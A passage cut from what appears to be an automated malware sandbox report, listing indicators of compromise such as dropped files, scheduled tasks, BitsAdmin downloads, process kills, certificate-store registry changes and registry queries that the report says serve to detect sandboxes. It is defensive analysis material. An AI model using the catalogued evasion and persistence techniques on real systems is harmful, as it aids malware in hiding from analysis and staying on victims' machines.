opened for modification C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_imem_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\control\liboldrc_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\libvlc.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\vlm_export.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\2 autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\03_lastfm.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\js\jquery.jstree.js autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\newgrounds.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\libssp-0.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\intf\modules\httprequests.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\cue.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libsubtitle_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegaudio_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\browse_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\jquery.jstree.js autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libvcd_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\01_googleimage.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\images\Video-48.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\browse_window.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpc_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libtta_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\cli.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\spu\libmosaic_plugin.dll autosubplayer.exe File opened for modification C:\Program Files\temp_files\cache.dat autosubplayer.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini WerFault.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_concat_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\vlm.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\mosaic_window.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc16x16.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\librss_plugin.dll autosubplayer.exe File created C:\Program Files\temp_files\bckf.fon data_load.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\Windows Media Player\Senanebekae.exe Sayma.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsv_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libudp_plugin.dll autosubplayer.exe -
Drops file in Windows directory 31 IoCs
Processes:
msiexec.exesvchost.exesvchost.exerundll32.exerundll32.exeMsiExec.exedescription ioc process File opened for modification C:\Windows\Installer\MSIC963.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID1C1.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Tasks\SA.DAT svchost.exe File opened for modification C:\Windows\Installer\MSI8483.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF014463F454FF37B2.TMP msiexec.exe File opened for modification C:\Windows\Tasks\SA.DAT svchost.exe File opened for modification C:\Windows\Tasks\SMBbvCSuKLI.job rundll32.exe File opened for modification C:\Windows\Installer\37214.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSID6E4.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFF8E.tmp msiexec.exe File created C:\Windows\Tasks\SMBbvCSuKLI.job rundll32.exe File created C:\Windows\Installer\37214.msi msiexec.exe File opened for modification C:\Windows\Installer\MSID4FF.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI96B4.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9FEE.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9916.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9D6D.tmp msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File opened for modification C:\Windows\Installer\MSIF7CD.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFAD0D03E9D764A901.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIA3F7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA688.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID049.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF00ECE9D2F899593B.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSID6F5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIEAFB.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File created C:\Windows\SystemTemp\~DFFAE9AE0655247B55.TMP msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 28 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 884 5732 WerFault.exe ShadowVPNInstaller_t3.exe 6552 5404 WerFault.exe rundll32.exe 6536 5148 WerFault.exe Fri10720d229511df563.exe 6452 5404 WerFault.exe rundll32.exe 6188 4736 WerFault.exe Fri1015b9a4e0b.exe 2552 6544 WerFault.exe CTutXdLZ4xbLs74URA0ecSII.exe 3192 5732 WerFault.exe ShadowVPNInstaller_t3.exe 5604 5280 WerFault.exe Fri10acd1e0a9e6.exe 7080 6288 WerFault.exe VQgrNhc4WsP27ikp84942S7c.exe 6988 5732 WerFault.exe ShadowVPNInstaller_t3.exe 5344 2340 WerFault.exe Firstoffer.exe 6780 6304 WerFault.exe 1U7rz2B7WbSFlXtvDg8Z5IbN.exe 7116 5732 WerFault.exe ShadowVPNInstaller_t3.exe 5296 6512 WerFault.exe ZwD24QUjPt3CXwW27xWlqIZe.exe 5612 6380 WerFault.exe uqqAcKDbb5l4Gg0p81LTojnE.exe 3024 5732 WerFault.exe ShadowVPNInstaller_t3.exe 6432 6200 WerFault.exe Fri105268dda3.exe 6316 5732 WerFault.exe ShadowVPNInstaller_t3.exe 6340 6372 WerFault.exe vOsoiDDO3Q_G73JC3fZnrc96.exe 6928 5540 WerFault.exe HkLf_4fWJBBP2aKw8B_EGPCJ.exe 5024 6340 WerFault.exe PlREWOPKJ6dQLCAu2xyyr7tT.exe 6300 6720 WerFault.exe YmLtMJXE5kpG5PRH_W7AZRIX.exe 2292 7084 WerFault.exe 6AF7.exe 7208 7420 WerFault.exe rundll32.exe 7932 7508 WerFault.exe E411.exe 15704 7340 WerFault.exe 2274.exe 8440 8248 WerFault.exe rundll32.exe 13928 13792 WerFault.exe RegAsm.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
e3pqPskkJwLs8LEChQJEssCE.exe2987.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e3pqPskkJwLs8LEChQJEssCE.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e3pqPskkJwLs8LEChQJEssCE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2987.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2987.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2987.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e3pqPskkJwLs8LEChQJEssCE.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
cmd.exeWerFault.exePlREWOPKJ6dQLCAu2xyyr7tT.exeWerFault.exeWerFault.exeWerFault.exeCYhWK6wGUBr_0KUI2pFoRj1Q.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeUltraMediaBurner.exeWerFault.exe2285034.scrWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString PlREWOPKJ6dQLCAu2xyyr7tT.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString CYhWK6wGUBr_0KUI2pFoRj1Q.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier PlREWOPKJ6dQLCAu2xyyr7tT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 UltraMediaBurner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier 2285034.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 CYhWK6wGUBr_0KUI2pFoRj1Q.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 2285034.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision PlREWOPKJ6dQLCAu2xyyr7tT.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 UltraMediaBurner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe -
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5372 schtasks.exe 4772 schtasks.exe 6276 schtasks.exe 6224 schtasks.exe 7476 schtasks.exe 8144 schtasks.exe 1460 schtasks.exe 1096 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 4028 timeout.exe 6504 timeout.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
Processes:
bitsadmin.exebitsadmin.exepid process 13176 bitsadmin.exe 13236 bitsadmin.exe -
Enumerates system info in registry 2 TTPs 61 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exe2285034.scrcmd.exeWerFault.exeWerFault.exeUltraMediaBurner.exeInstall.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exePlREWOPKJ6dQLCAu2xyyr7tT.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeInstall.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 2285034.scr Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU UltraMediaBurner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU PlREWOPKJ6dQLCAu2xyyr7tT.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 2285034.scr Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS UltraMediaBurner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS PlREWOPKJ6dQLCAu2xyyr7tT.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5172 taskkill.exe 4560 taskkill.exe 1896 taskkill.exe 4340 taskkill.exe 3692 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
Processes:
sihclient.exemsiexec.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key deleted 